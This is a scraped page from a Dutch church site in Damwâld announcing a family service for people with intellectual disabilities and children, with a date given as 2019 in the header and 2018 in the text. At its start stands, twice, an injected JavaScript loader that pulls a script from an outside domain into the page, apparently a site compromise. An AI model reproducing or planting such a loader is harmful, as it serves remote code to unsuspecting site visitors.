;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bijzondere gezinsdienst ... Welkom ! - PKN Damwâld
6 oktober 2019
14:00 t/m 15:00
De Ikker
Bijzondere gezinsdienst … Welkom !

Zondagmiddag 6 oktober 2018 bent u om 14.00 uur van harte welkom in de De Ikker, Hearewei 1 in Damwâld,  voor een bijzondere gezinsdienst. Ds. G.J. Otter gaat voor in deze dienst. Het thema is dit keer ‘De storm op het meer’. Van harte welkom !

Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op de mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.

Locatie: De IkkerHearewei 1, Damwâld